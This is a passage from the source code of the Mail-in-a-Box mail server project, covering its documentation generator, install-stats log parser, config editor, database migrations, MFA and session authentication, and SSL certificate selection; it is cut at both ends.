characters. newscript += c # "<< EOF" escaping. if quote_mode is None and re.search("<<\s*EOF\n$", newscript): quote_mode = "EOF" elif quote_mode == "EOF" and re.search("\nEOF\n$", newscript): quote_mode = None return newscript def recode_bash(s): def requote(tok): tok = tok.replace("\\", "\\\\") for c in bash_special_characters2: tok = tok.replace(c, "\\" + c) tok = fixup_tokens(tok) if " " in tok or '"' in tok: tok = tok.replace("\"", "\\\"") tok = '"' + tok +'"' else: tok = tok.replace("'", "\\'") return tok return cgi.escape(" ".join(requote(tok) for tok in s.split(" "))) def fixup_tokens(s): for c, enc in bash_special_characters1.items(): s = s.replace(enc, c) for c, enc in bash_special_characters2.items(): s = s.replace(enc, c) for esc, c in bash_escapes.items(): s = s.replace(c, "\\" + esc) return s class BashScript(Grammar): grammar = (OPTIONAL(HashBang), REPEAT(BashElement)) def value(self): return [line.value() for line in self[1]] @staticmethod def parse(fn): if fn in ("setup/functions.sh", "/etc/mailinabox.conf"): return "" with open(fn, "r") as f: string = f.read() # tokenize string = re.sub(".* #NODOC\n", "", string) string = re.sub("\n\s*if .*then.*|\n\s*fi|\n\s*else|\n\s*elif .*", "", string) string = quasitokenize(string) string = re.sub("hide_output ", "", string) parser = BashScript.parser() result = parser.parse_string(string) v = "<div class='row'><div class='col-xs-12 sourcefile'>view the bash source for the following section at <a href=\"%s\">%s</a></div></div>\n" \ % ("https://github.com/mail-in-a-box/mailinabox/tree/master/" + fn, fn) mode = 0 for item in result.value(): if item.strip() == "": pass elif item.startswith("<p") and not item.startswith("<pre"): clz = "" if mode == 2: v += "</div>\n" # col v += "</div>\n" # row mode = 0 clz = "contd" if mode == 0: v += "<div class='row %s'>\n" % clz v += "<div class='col-md-6 prose'>\n" v += item mode = 1 elif item.startswith("<h"): if mode != 0: v += "</div>\n" # col v += "</div>\n" # row v += "<div class='row'>\n" v += "<div class='col-md-6 header'>\n" v += item v += "</div>\n" # col v += "<div class='col-md-6 terminal'> </div>\n" v += "</div>\n" # row mode = 0 else: if mode == 0: v += "<div class='row'>\n" v += "<div class='col-md-offset-6 col-md-6 terminal'>\n" elif mode == 1: v += "</div>\n" v += "<div class='col-md-6 terminal'>\n" mode = 2 v += item v += "</div>\n" # col v += "</div>\n" # row v = fixup_tokens(v) v = v.replace("</pre>\n<pre class='shell'>", "") v = re.sub("<pre>([\w\W]*?)</pre>", lambda m : "<pre>" + strip_indent(m.group(1)) + "</pre>", v) v = re.sub(r"(\$?)PRIMARY_HOSTNAME", r"<b>box.yourdomain.com</b>", v) v = re.sub(r"\$STORAGE_ROOT", r"<b>$STORE</b>", v) v = v.replace("`pwd`", "<code><b>/path/to/mailinabox</b></code>") return v def wrap_lines(text, cols=60): ret = "" words = re.split("(\s+)", text) linelen = 0 for w in words: if linelen + len(w) > cols-1: ret += " \\\n" ret += " " linelen = 0 if linelen == 0 and w.strip() == "": continue ret += w linelen += len(w) return ret if __name__ == '__main__': generate_documentation() File: tools/parse-nginx-log-bootstrap-accesses.py #!/usr/bin/python3 # # This is a tool Josh uses on his box serving mailinabox.email to parse the nginx # access log to see how many people are installing Mail-in-a-Box each day, by # looking at accesses to the bootstrap.sh script (which is currently at the URL # .../setup.sh). import re, glob, gzip, os.path, json import dateutil.parser outfn = "/home/user-data/www/mailinabox.email/install-stats.json" # Make a unique list of (date, ip address) pairs so we don't double-count # accesses that are for the same install. accesses = set() # Scan the current and rotated access logs. for fn in glob.glob("/var/log/nginx/access.log*"): # Gunzip if necessary. # Loop through the lines in the access log. with (gzip.open if fn.endswith(".gz") else open)(fn, "rb") as f: for line in f: # Find lines that are GETs on the bootstrap script by either curl or wget. # (Note that we purposely skip ...?ping=1 requests which is the admin panel querying us for updates.) # (Also, the URL changed in January 2016, but we'll accept both.) m = re.match(rb"(?P<ip>\S+) - - \[(?P<date>.*?)\] \"GET /(bootstrap.sh|setup.sh) HTTP/.*\" 200 \d+ .* \"(?:curl|wget)", line, re.I) if m: date, time = m.group("date").decode("ascii").split(":", 1) date = dateutil.parser.parse(date).date().isoformat() ip = m.group("ip").decode("ascii") accesses.add( (date, ip) ) # Aggregate by date. by_date = { } for date, ip in accesses: by_date[date] = by_date.get(date, 0) + 1 # Since logs are rotated, store the statistics permanently in a JSON file. # Load in the stats from an existing file. if os.path.exists(outfn): with open(outfn, encoding="utf-8") as f: existing_data = json.load(f) for date, count in existing_data: if date not in by_date: by_date[date] = count # Turn into a list rather than a dict structure to make it ordered. by_date = sorted(by_date.items()) # Pop the last one because today's stats are incomplete. by_date.pop(-1) # Write out. with open(outfn, "w", encoding="utf-8") as f: json.dump(by_date, f, sort_keys=True, indent=True) File: tools/editconf.py #!/usr/bin/python3 # # This is a helper tool for editing configuration files during the setup # process. The tool is given new values for settings as command-line # arguments. It comments-out existing setting values in the configuration # file and adds new values either after their former location or at the # end. # # The configuration file has settings that look like: # # NAME=VALUE # # If the -s option is given, then space becomes the delimiter, i.e.: # # NAME VALUE # # If the -e option is given and VALUE is empty, the setting is removed # from the configuration file if it is set (i.e. existing occurrences # are commented out and no new setting is added). # # If the -c option is given, then the supplied character becomes the comment character # # If the -w option is given, then setting lines continue onto following # lines while the lines start with whitespace, e.g.: # # NAME VAL # UE import sys, re # sanity check if len(sys.argv) < 3: print("usage: python3 editconf.py /etc/file.conf [-e] [-s] [-w] [-c <CHARACTER>] [-t] NAME=VAL [NAME=VAL ...]") sys.exit(1) # parse command line arguments filename = sys.argv[1] settings = sys.argv[2:] delimiter = "=" delimiter_re = r"\s*=\s*" erase_setting = False comment_char = "#" folded_lines = False testing = False while settings[0][0] == "-" and settings[0] != "--": opt = settings.pop(0) if opt == "-s": # Space is the delimiter delimiter = " " delimiter_re = r"\s+" elif opt == "-e": # Erase settings that have empty values. erase_setting = True elif opt == "-w": # Line folding is possible in this file. folded_lines = True elif opt == "-c": # Specifies a different comment character. comment_char = settings.pop(0) elif opt == "-t": testing = True else: print("Invalid option.") sys.exit(1) # sanity check command line for setting in settings: try: name, value = setting.split("=", 1) except: import subprocess print("Invalid command line: ", subprocess.list2cmdline(sys.argv)) # create the new config file in memory found = set() buf = "" with open(filename, encoding="utf-8") as f: input_lines = list(f) while len(input_lines) > 0: line = input_lines.pop(0) # If this configuration file uses folded lines, append any folded lines # into our input buffer. if folded_lines and line[0] not in {comment_char, " ", ""}: while len(input_lines) > 0 and input_lines[0][0] in " \t": line += input_lines.pop(0) # See if this line is for any settings passed on the command line. for i in range(len(settings)): # Check if this line contain this setting from the command-line arguments. name, val = settings[i].split("=", 1) m = re.match( r"(\s*)" "(" + re.escape(comment_char) + r"\s*)?" + re.escape(name) + delimiter_re + r"(.*?)\s*$", line, re.S) if not m: continue indent, is_comment, existing_val = m.groups() # If this is already the setting, keep it in the file, except: # * If we've already seen it before, then remove this duplicate line. # * If val is empty and erase_setting is on, then comment it out. if is_comment is None and existing_val == val and not (not val and erase_setting): # It may be that we've already inserted this setting higher # in the file so check for that first. if i in found: break buf += line found.add(i) break # comment-out the existing line (also comment any folded lines) if is_comment is None: buf += comment_char + line.rstrip().replace("\n", "\n" + comment_char) + "\n" else: # the line is already commented, pass it through buf += line # if this option already is set don't add the setting again, # or if we're clearing the setting with -e, don't add it if (i in found) or (not val and erase_setting): break # add the new setting buf += indent + name + delimiter + val + "\n" # note that we've applied this option found.add(i) break else: # If did not match any setting names, pass this line through. buf += line # Put any settings we didn't see at the end of the file, # except settings being cleared. for i in range(len(settings)): if i not in found: name, val = settings[i].split("=", 1) if not (not val and erase_setting): buf += name + delimiter + val + "\n" if not testing: # Write out the new file. with open(filename, "w", encoding="utf-8") as f: f.write(buf) else: # Just print the new file to stdout. print(buf) File: setup/migrate.py #!/usr/bin/python3 # Migrates any file structures, database schemas, etc. between versions of Mail-in-a-Box. # We have to be careful here that any dependencies are already installed in the previous # version since this script runs before all other aspects of the setup script. import sys, os, os.path, glob, re, shutil sys.path.insert(0, 'management') from utils import load_environment, save_environment, shell import contextlib def migration_1(env): # Re-arrange where we store SSL certificates. There was a typo also. def move_file(fn, domain_name_escaped, filename): # Moves an SSL-related file into the right place. fn1 = os.path.join( env["STORAGE_ROOT"], 'ssl', domain_name_escaped, file_type) os.makedirs(os.path.dirname(fn1), exist_ok=True) shutil.move(fn, fn1) # Migrate the 'domains' directory. for sslfn in glob.glob(os.path.join( env["STORAGE_ROOT"], 'ssl/domains/*' )): fn = os.path.basename(sslfn) m = re.match("(.*)_(certifiate.pem|cert_sign_req.csr|private_key.pem)$", fn) if m: # get the new name for the file domain_name, file_type = m.groups() if file_type == "certifiate.pem": file_type = "ssl_certificate.pem" # typo if file_type == "cert_sign_req.csr": file_type = "certificate_signing_request.csr" # nicer move_file(sslfn, domain_name, file_type) # Move the old domains directory if it is now empty. with contextlib.suppress(Exception): os.rmdir(os.path.join( env["STORAGE_ROOT"], 'ssl/domains')) def migration_2(env): # Delete the .dovecot_sieve script everywhere. This was formerly a copy of our spam -> Spam # script. We now install it as a global script, and we use managesieve, so the old file is # irrelevant. Also delete the compiled binary form. for fn in glob.glob(os.path.join(env["STORAGE_ROOT"], 'mail/mailboxes/*/*/.dovecot.sieve')): os.unlink(fn) for fn in glob.glob(os.path.join(env["STORAGE_ROOT"], 'mail/mailboxes/*/*/.dovecot.svbin')): os.unlink(fn) def migration_3(env): # Move the migration ID from /etc/mailinabox.conf to $STORAGE_ROOT/mailinabox.version # so that the ID stays with the data files that it describes the format of. The writing # of the file will be handled by the main function. pass def migration_4(env): # Add a new column to the mail users table where we can store administrative privileges. db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite') shell("check_call", ["sqlite3", db, "ALTER TABLE users ADD privileges TEXT NOT NULL DEFAULT ''"]) def migration_5(env): # The secret key for encrypting backups was world readable. Fix here. os.chmod(os.path.join(env["STORAGE_ROOT"], 'backup/secret_key.txt'), 0o600) def migration_6(env): # We now will generate multiple DNSSEC keys for different algorithms, since TLDs may # not support them all. .email only supports RSA/SHA-256. Rename the keys.conf file # to be algorithm-specific. basepath = os.path.join(env["STORAGE_ROOT"], 'dns/dnssec') shutil.move(os.path.join(basepath, 'keys.conf'), os.path.join(basepath, 'RSASHA1-NSEC3-SHA1.conf')) def migration_7(env): # I previously wanted domain names to be stored in Unicode in the database. Now I want them # to be in IDNA. Affects aliases only. import sqlite3 conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/users.sqlite")) # Get existing alias source addresses. c = conn.cursor() c.execute('SELECT source FROM aliases') aliases = [ row[0] for row in c.fetchall() ] # Update to IDNA-encoded domains. for email in aliases: try: localpart, domainpart = email.split("@") domainpart = domainpart.encode("idna").decode("ascii") newemail = localpart + "@" + domainpart if newemail != email: c = conn.cursor() c.execute("UPDATE aliases SET source=? WHERE source=?", (newemail, email)) if c.rowcount != 1: raise ValueError("Alias not found.") print("Updated alias", email, "to", newemail) except Exception as e: print("Error updating IDNA alias", email, e) # Save. conn.commit() def migration_8(env): # Delete DKIM keys. We had generated 1024-bit DKIM keys. # By deleting the key file we'll automatically generate # a new key, which will be 2048 bits. os.unlink(os.path.join(env['STORAGE_ROOT'], 'mail/dkim/mail.private')) def migration_9(env): # Add a column to the aliases table to store permitted_senders, # which is a list of user account email addresses that are # permitted to send mail using this alias instead of their own # address. This was motivated by the addition of #427 ("Reject # outgoing mail if FROM does not match Login") - which introduced # the notion of outbound permitted-senders. db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite') shell("check_call", ["sqlite3", db, "ALTER TABLE aliases ADD permitted_senders TEXT"]) def migration_10(env): # Clean up the SSL certificates directory. # Move the primary certificate to a new name and then # symlink it to the system certificate path. import datetime system_certificate = os.path.join(env["STORAGE_ROOT"], 'ssl/ssl_certificate.pem') if not os.path.islink(system_certificate): # not already a symlink new_path = os.path.join(env["STORAGE_ROOT"], 'ssl', env['PRIMARY_HOSTNAME'] + "-" + datetime.datetime.now().date().isoformat().replace("-", "") + ".pem") print("Renamed", system_certificate, "to", new_path, "and created a symlink for the original location.") shutil.move(system_certificate, new_path) os.symlink(new_path, system_certificate) # Flatten the directory structure. For any directory # that contains a single file named ssl_certificate.pem, # move the file out and name it the same as the directory, # and remove the directory. for sslcert in glob.glob(os.path.join( env["STORAGE_ROOT"], 'ssl/*/ssl_certificate.pem' )): d = os.path.dirname(sslcert) if len(os.listdir(d)) == 1: # This certificate is the only file in that directory. newname = os.path.join(env["STORAGE_ROOT"], 'ssl', os.path.basename(d) + '.pem') if not os.path.exists(newname): shutil.move(sslcert, newname) os.rmdir(d) def migration_11(env): # Archive the old Let's Encrypt account directory managed by free_tls_certificates # because we'll use that path now for the directory managed by certbot. try: old_path = os.path.join(env["STORAGE_ROOT"], 'ssl', 'lets_encrypt') new_path = os.path.join(env["STORAGE_ROOT"], 'ssl', 'lets_encrypt-old') shutil.move(old_path, new_path) except: # meh pass def migration_12(env): # Upgrading to Carddav Roundcube plugin to version 3+, it requires the carddav_* # tables to be dropped. # Checking that the roundcube database already exists. if os.path.exists(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite")): import sqlite3 conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite")) c = conn.cursor() # Get a list of all the tables that begin with 'carddav_' c.execute("SELECT name FROM sqlite_master WHERE type = ? AND name LIKE ?", ('table', 'carddav_%')) carddav_tables = c.fetchall() # If there were tables that begin with 'carddav_', drop them if carddav_tables: for table in carddav_tables: try: table = table[0] c = conn.cursor() dropcmd = "DROP TABLE %s" % table c.execute(dropcmd) except: print("Failed to drop table", table) # Save. conn.commit() conn.close() # Delete all sessions, requiring users to login again to recreate carddav_* # databases conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite")) c = conn.cursor() c.execute("delete from session;") conn.commit() conn.close() def migration_13(env): # Add the "mfa" table for configuring MFA for login to the control panel. db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite') shell("check_call", ["sqlite3", db, "CREATE TABLE mfa (id INTEGER PRIMARY KEY AUTOINCREMENT, user_id INTEGER NOT NULL, type TEXT NOT NULL, secret TEXT NOT NULL, mru_token TEXT, label TEXT, FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE CASCADE);"]) def migration_14(env): # Add the "auto_aliases" table. db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite') shell("check_call", ["sqlite3", db, "CREATE TABLE auto_aliases (id INTEGER PRIMARY KEY AUTOINCREMENT, source TEXT NOT NULL UNIQUE, destination TEXT NOT NULL, permitted_senders TEXT);"]) ########################################################### def get_current_migration(): ver = 0 while True: next_ver = (ver + 1) migration_func = globals().get("migration_%d" % next_ver) if not migration_func: return ver ver = next_ver def run_migrations(): if not os.access("/etc/mailinabox.conf", os.W_OK, effective_ids=True): print("This script must be run as root.", file=sys.stderr) sys.exit(1) env = load_environment() migration_id_file = os.path.join(env['STORAGE_ROOT'], 'mailinabox.version') migration_id = None if os.path.exists(migration_id_file): with open(migration_id_file, encoding='utf-8') as f: migration_id = f.read().strip() if migration_id is None: # Load the legacy location of the migration ID. We'll drop support # for this eventually. migration_id = env.get("MIGRATIONID") if migration_id is None: print() print(f"{migration_id_file} file doesn't exists. Skipping migration...") return ourver = int(migration_id) while True: next_ver = (ourver + 1) migration_func = globals().get("migration_%d" % next_ver) if not migration_func: # No more migrations to run. break print() print("Running migration to Mail-in-a-Box #%d..." % next_ver) try: migration_func(env) except Exception as e: print() print("Error running the migration script:") print() print(e) print() print("Your system may be in an inconsistent state now. We're terribly sorry. A re-install from a backup might be the best way to continue.") sys.exit(1) ourver = next_ver # Write out our current version now. Do this sooner rather than later # in case of any problems. with open(migration_id_file, "w", encoding='utf-8') as f: f.write(str(ourver) + "\n") # Delete the legacy location of this field. if "MIGRATIONID" in env: del env["MIGRATIONID"] save_environment(env) # iterate and try next version... if __name__ == "__main__": if sys.argv[-1] == "--current": # Return the number of the highest migration. print(str(get_current_migration())) elif sys.argv[-1] == "--migrate": # Perform migrations. run_migrations() File: management/mfa.py import base64 import hmac import io import os import pyotp import qrcode from mailconfig import open_database def get_user_id(email, c): c.execute('SELECT id FROM users WHERE email=?', (email,)) r = c.fetchone() if not r: raise ValueError("User does not exist.") return r[0] def get_mfa_state(email, env): c = open_database(env) c.execute('SELECT id, type, secret, mru_token, label FROM mfa WHERE user_id=?', (get_user_id(email, c),)) return [ { "id": r[0], "type": r[1], "secret": r[2], "mru_token": r[3], "label": r[4] } for r in c.fetchall() ] def get_public_mfa_state(email, env): mfa_state = get_mfa_state(email, env) return [ { "id": s["id"], "type": s["type"], "label": s["label"] } for s in mfa_state ] def get_hash_mfa_state(email, env): mfa_state = get_mfa_state(email, env) return [ { "id": s["id"], "type": s["type"], "secret": s["secret"] } for s in mfa_state ] def enable_mfa(email, type, secret, token, label, env): if type == "totp": validate_totp_secret(secret) # Sanity check with the provide current token. totp = pyotp.TOTP(secret) if not totp.verify(token, valid_window=1): msg = "Invalid token." raise ValueError(msg) else: msg = "Invalid MFA type." raise ValueError(msg) conn, c = open_database(env, with_connection=True) c.execute('INSERT INTO mfa (user_id, type, secret, label) VALUES (?, ?, ?, ?)', (get_user_id(email, c), type, secret, label)) conn.commit() def set_mru_token(email, mfa_id, token, env): conn, c = open_database(env, with_connection=True) c.execute('UPDATE mfa SET mru_token=? WHERE user_id=? AND id=?', (token, get_user_id(email, c), mfa_id)) conn.commit() def disable_mfa(email, mfa_id, env): conn, c = open_database(env, with_connection=True) if mfa_id is None: # Disable all MFA for a user. c.execute('DELETE FROM mfa WHERE user_id=?', (get_user_id(email, c),)) else: # Disable a particular MFA mode for a user. c.execute('DELETE FROM mfa WHERE user_id=? AND id=?', (get_user_id(email, c), mfa_id)) conn.commit() return c.rowcount > 0 def validate_totp_secret(secret): if not isinstance(secret, str) or secret.strip() == "": msg = "No secret provided." raise ValueError(msg) if len(secret) != 32: msg = "Secret should be a 32 characters base32 string" raise ValueError(msg) def provision_totp(email, env): # Make a new secret. secret = base64.b32encode(os.urandom(20)).decode('utf-8') validate_totp_secret(secret) # sanity check # Make a URI that we encode within a QR code. uri = pyotp.TOTP(secret).provisioning_uri( name=email, issuer_name=env["PRIMARY_HOSTNAME"] + " Mail-in-a-Box Control Panel" ) # Generate a QR code as a base64-encode PNG image. qr = qrcode.make(uri) byte_arr = io.BytesIO() qr.save(byte_arr, format='PNG') png_b64 = base64.b64encode(byte_arr.getvalue()).decode('utf-8') return { "type": "totp", "secret": secret, "qr_code_base64": png_b64 } def validate_auth_mfa(email, request, env): # Validates that a login request satisfies any MFA modes # that have been enabled for the user's account. Returns # a tuple (status, [hints]). status is True for a successful # MFA login, False for a missing token. If status is False, # hints is an array of codes that indicate what the user # can try. Possible codes are: # "missing-totp-token" # "invalid-totp-token" mfa_state = get_mfa_state(email, env) # If no MFA modes are added, return True. if len(mfa_state) == 0: return (True, []) # Try the enabled MFA modes. hints = set() for mfa_mode in mfa_state: if mfa_mode["type"] == "totp": # Check that a token is present in the X-Auth-Token header. # If not, give a hint that one can be supplied. token = request.headers.get('x-auth-token') if not token: hints.add("missing-totp-token") continue # Check for a replay attack. if hmac.compare_digest(token, mfa_mode['mru_token'] or ""): # If the token fails, skip this MFA mode. hints.add("invalid-totp-token") continue # Check the token. totp = pyotp.TOTP(mfa_mode["secret"]) if not totp.verify(token, valid_window=1): hints.add("invalid-totp-token") continue # On success, record the token to prevent a replay attack. set_mru_token(email, mfa_mode['id'], token, env) return (True, []) # On a failed login, indicate failure and any hints for what the user can do instead. return (False, list(hints)) File: management/auth.py import base64, hmac, json, secrets from datetime import timedelta from expiringdict import ExpiringDict import utils from mailconfig import get_mail_password, get_mail_user_privileges from mfa import get_hash_mfa_state, validate_auth_mfa DEFAULT_KEY_PATH = '/var/lib/mailinabox/api.key' DEFAULT_AUTH_REALM = 'Mail-in-a-Box Management Server' class AuthService: def __init__(self): self.auth_realm = DEFAULT_AUTH_REALM self.key_path = DEFAULT_KEY_PATH self.max_session_duration = timedelta(days=2) self.init_system_api_key() self.sessions = ExpiringDict(max_len=64, max_age_seconds=self.max_session_duration.total_seconds()) def init_system_api_key(self): """Write an API key to a local file so local processes can use the API""" with open(self.key_path, encoding='utf-8') as file: self.key = file.read() def authenticate(self, request, env, login_only=False, logout=False): """Test if the HTTP Authorization header's username matches the system key, a session key, or if the username/password passed in the header matches a local user. Returns a tuple of the user's email address and list of user privileges (e.g. ('my@email', []) or ('my@email', ['admin']); raises a ValueError on login failure. If the user used the system API key, the user's email is returned as None since this key is not associated with a user.""" def parse_http_authorization_basic(header): def decode(s): return base64.b64decode(s.encode('ascii')).decode('ascii') if " " not in header: return None, None scheme, credentials = header.split(maxsplit=1) if scheme != 'Basic': return None, None credentials = decode(credentials) if ":" not in credentials: return None, None username, password = credentials.split(':', maxsplit=1) return username, password username, password = parse_http_authorization_basic(request.headers.get('Authorization', '')) if username in {None, ""}: msg = "Authorization header invalid." raise ValueError(msg) if username.strip() == "" and password.strip() == "": msg = "No email address, password, session key, or API key provided." raise ValueError(msg) # If user passed the system API key, grant administrative privs. This key # is not associated with a user. if username == self.key and not login_only: return (None, ["admin"]) # If the password corresponds with a session token for the user, grant access for that user. if self.get_session(username, password, "login", env) and not login_only: sessionid = password session = self.sessions[sessionid] if logout: # Clear the session. del self.sessions[sessionid] else: # Re-up the session so that it does not expire. self.sessions[sessionid] = session # If no password was given, but a username was given, we're missing some information. elif password.strip() == "": msg = "Enter a password." raise ValueError(msg) else: # The user is trying to log in with a username and a password # (and possibly a MFA token). On failure, an exception is raised. self.check_user_auth(username, password, request, env) # Get privileges for authorization. This call should never fail because by this # point we know the email address is a valid user --- unless the user has been # deleted after the session was granted. On error the call will return a tuple # of an error message and an HTTP status code. privs = get_mail_user_privileges(username, env) if isinstance(privs, tuple): raise ValueError(privs[0]) # Return the authorization information. return (username, privs) def check_user_auth(self, email, pw, request, env): # Validate a user's login email address and password. If MFA is enabled, # check the MFA token in the X-Auth-Token header. # # On login failure, raises a ValueError with a login error message. On # success, nothing is returned. # Authenticate. try: # Get the hashed password of the user. Raise a ValueError if the # email address does not correspond to a user. But wrap it in the # same exception as if a password fails so we don't easily reveal # if an email address is valid. pw_hash = get_mail_password(email, env) # Use 'doveadm pw' to check credentials. doveadm will return # a non-zero exit status if the credentials are no good, # and check_call will raise an exception in that case. utils.shell('check_call', [ "/usr/bin/doveadm", "pw", "-p", pw, "-t", pw_hash, ]) except: # Login failed. msg = "Incorrect email address or password." raise ValueError(msg) # If MFA is enabled, check that MFA passes. status, hints = validate_auth_mfa(email, request, env) if not status: # Login valid. Hints may have more info. raise ValueError(",".join(hints)) def create_user_password_state_token(self, email, env): # Create a token that changes if the user's password or MFA options change # so that sessions become invalid if any of that information changes. msg = get_mail_password(email, env).encode("utf8") # Add to the message the current MFA state, which is a list of MFA information. # Turn it into a string stably. msg += b" " + json.dumps(get_hash_mfa_state(email, env), sort_keys=True).encode("utf8") # Make a HMAC using the system API key as a hash key. hash_key = self.key.encode('ascii') return hmac.new(hash_key, msg, digestmod="sha256").hexdigest() def create_session_key(self, username, env, type=None): # Create a new session. token = secrets.token_hex(32) self.sessions[token] = { "email": username, "password_token": self.create_user_password_state_token(username, env), "type": type, } return token def get_session(self, user_email, session_key, session_type, env): if session_key not in self.sessions: return None session = self.sessions[session_key] if session_type == "login" and session["email"] != user_email: return None if session["type"] != session_type: return None if session["password_token"] != self.create_user_password_state_token(session["email"], env): return None return session File: management/ssl_certificates.py #!/usr/local/lib/mailinabox/env/bin/python # Utilities for installing and selecting SSL certificates. import os, os.path, re, shutil, subprocess, tempfile from utils import shell, safe_domain_name, sort_domains import functools import operator # SELECTING SSL CERTIFICATES FOR USE IN WEB def get_ssl_certificates(env): # Scan all of the installed SSL certificates and map every domain # that the certificates are good for to the best certificate for # the domain. from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey from cryptography.x509 import Certificate # The certificates are all stored here: ssl_root = os.path.join(env["STORAGE_ROOT"], 'ssl') # List all of the files in the SSL directory and one level deep. def get_file_list(): if not os.path.exists(ssl_root): return for fn in os.listdir(ssl_root): if fn == 'ssl_certificate.pem': # This is always a symbolic link # to the certificate to use for # PRIMARY_HOSTNAME. Don't let it # be eligible for use because we # could end up creating a symlink # to itself --- we want to find # the cert that it should be a # symlink to. continue fn = os.path.join(ssl_root, fn) if os.path.isfile(fn): yield fn elif os.path.isdir(fn): for fn1 in os.listdir(fn): fn1 = os.path.join(fn, fn1) if os.path.isfile(fn1): yield fn1 # Remember stuff. private_keys = { } certificates = [ ] # Scan each of the files to find private keys and certificates. # We must load all of the private keys first before processing # certificates so that we can check that we have a private key # available before using a certificate. for fn in get_file_list(): try: pem = load_pem(load_cert_chain(fn)[0]) except ValueError: # Not a valid PEM format for a PEM type we care about. continue # Is it a private key? if isinstance(pem, RSAPrivateKey): private_keys[pem.public_key().public_numbers()] = { "filename": fn, "key": pem } # Is it a certificate? if isinstance(pem, Certificate): certificates.append({ "filename": fn, "cert": pem }) # Process the certificates. domains = { } for cert in certificates: # What domains is this certificate good for? cert_domains, primary_domain = get_certificate_domains(cert["cert"]) cert["primary_domain"] = primary_domain # Is there a private key file for this certificate? private_key = private_keys.get(cert["cert"].public_key().public_numbers()) if not private_key: continue cert["private_key"] = private_key # Add this cert to the list of certs usable for the domains. for domain in cert_domains: # The primary hostname can only use a certificate mapped # to the system private key. if domain == env['PRIMARY_HOSTNAME'] and cert["private_key"]["filename"] != os.path.join(env['STORAGE_ROOT'], 'ssl', 'ssl_private_key.pem'): continue domains.setdefault(domain, []).append(cert) # Sort the certificates to prefer good ones. import datetime now = datetime.datetime.utcnow() ret = { } for domain, cert_list in domains.items(): #for c in cert_list: print(domain, c.not_valid_before, c.not_valid_after, "("+str(now)+")", c.issuer, c.subject, c._filename) cert_list.sort(key = lambda cert : ( # must be valid NOW cert["cert"].not_valid_before <= now <= cert["cert"].not_valid_after, # prefer one that is not self-signed cert["cert"].issuer != cert["cert"].subject, ########################################################### # The above lines ensure that valid certificates are chosen # over invalid certificates. The lines below choose between # multiple valid certificates available for this domain. ########################################################### # prefer one with the expiration furthest into the future so # that we can easily rotate to new certs as we get them cert["cert"].not_valid_after, ########################################################### # We always choose the certificate that is good for the # longest period of time. This is important for how we # provision certificates for Let's Encrypt. To ensure that # we don't re-provision every night, we have to ensure that # if we choose to provison a certificate that it will # *actually* be used so the provisioning logic knows it # doesn't still need to provision a certificate for the # domain. ########################################################### # in case a certificate is installed in multiple paths, # prefer the... lexicographically last one? cert["filename"], ), reverse=True) cert = cert_list.pop(0) ret[domain] = { "private-key": cert["private_key"]["filename"], "certificate": cert["filename"], "primary-domain": cert["primary_domain"], "certificate_object": cert["cert"], } return ret def get_domain_ssl_files(domain, ssl_certificates, env, allow_missing_cert=False, use_main_cert=True): if use_main_cert or not allow_missing_cert: # Get the system certificate info. ssl_private_key = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', 'ssl_private_key.pem')) ssl_certificate = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', 'ssl_certificate.pem')) system_certificate = { "private-key": ssl_private_key, "certificate": ssl_certificate, "primary-domain": env['PRIMARY_HOSTNAME'], "certificate_object": load_pem(load_cert_chain(ssl_certificate)[0]), } if use_main_cert and domain == env['PRIMARY_HOSTNAME']: # The primary domain must use the server certificate because # it is hard-coded in some service configuration files. return system_certificate wildcard_domain = re.sub(r"^[^\.]+", "*", domain) if domain in ssl_certificates: return ssl_certificates[domain] elif wildcard_domain in ssl_certificates: return ssl_certificates[wildcard_domain] elif not allow_missing_cert: # No valid certificate is available for this domain! Return default files. return system_certificate else: # No valid certificate is available for this domain. return None # PROVISIONING CERTIFICATES FROM LETSENCRYPT def get_certificates_to_provision(env, limit_domains=None, show_valid_certs=True): # Get a set of domain names that we can provision certificates for # using certbot. We start with domains that the box is serving web # for and subtract: # * domains not in limit_domains if limit_domains is not empty # * domains with custom "A" records, i.e. they are hosted elsewhere # * domains with actual "A" records that point elsewhere (misconfiguration) # * domains that already have certificates that will be valid for a while from web_update import get_web_domains from status_checks import query_dns, normalize_ip existing_certs = get_ssl_certificates(env) plausible_web_domains = get_web_domains(env, exclude_dns_elsewhere=False) actual_web_domains = get_web_domains(env) domains_to_provision = set() domains_cant_provision = { } for domain in plausible_web_domains: # Skip domains that the user doesn't want to provision now. if limit_domains and domain not in limit_domains: continue # Check that there isn't an explicit A/AAAA record. if domain not in actual_web_domains: domains_cant_provision[domain] = "The domain has a custom DNS A/AAAA record that points the domain elsewhere, so there is no point to installing a TLS certificate here and we could not automatically provision one anyway because provisioning requires access to the website (which isn't here)." # Check that the DNS resolves to here. else: # Does the domain resolve to this machine in public DNS? If not, # we can't do domain control validation. For IPv6 is configured, # make sure both IPv4 and IPv6 are correct because we don't know # how Let's Encrypt will connect. bad_dns = [] for rtype, value in [("A", env["PUBLIC_IP"]), ("AAAA", env.get("PUBLIC_IPV6"))]: if not value: continue # IPv6 is not configured response = query_dns(domain, rtype) if response != normalize_ip(value): bad_dns.append(f"{response} ({rtype})") if bad_dns: domains_cant_provision[domain] = "The domain name does not resolve to this machine: " \ + (", ".join(bad_dns)) \ + "." else: # DNS is all good. # Check for a good existing cert. existing_cert = get_domain_ssl_files(domain, existing_certs, env, use_main_cert=False, allow_missing_cert=True) if existing_cert: existing_cert_check = check_certificate(domain, existing_cert['certificate'], existing_cert['private-key'], warn_if_expiring_soon=14) if existing_cert_check[0] == "OK": if show_valid_certs: domains_cant_provision[domain] = "The domain has a valid certificate already. ({} Certificate: {}, private key {})".format( existing_cert_check[1], existing_cert['certificate'], existing_cert['private-key']) continue domains_to_provision.add(domain) return (domains_to_provision, domains_cant_provision) def provision_certificates(env, limit_domains): # 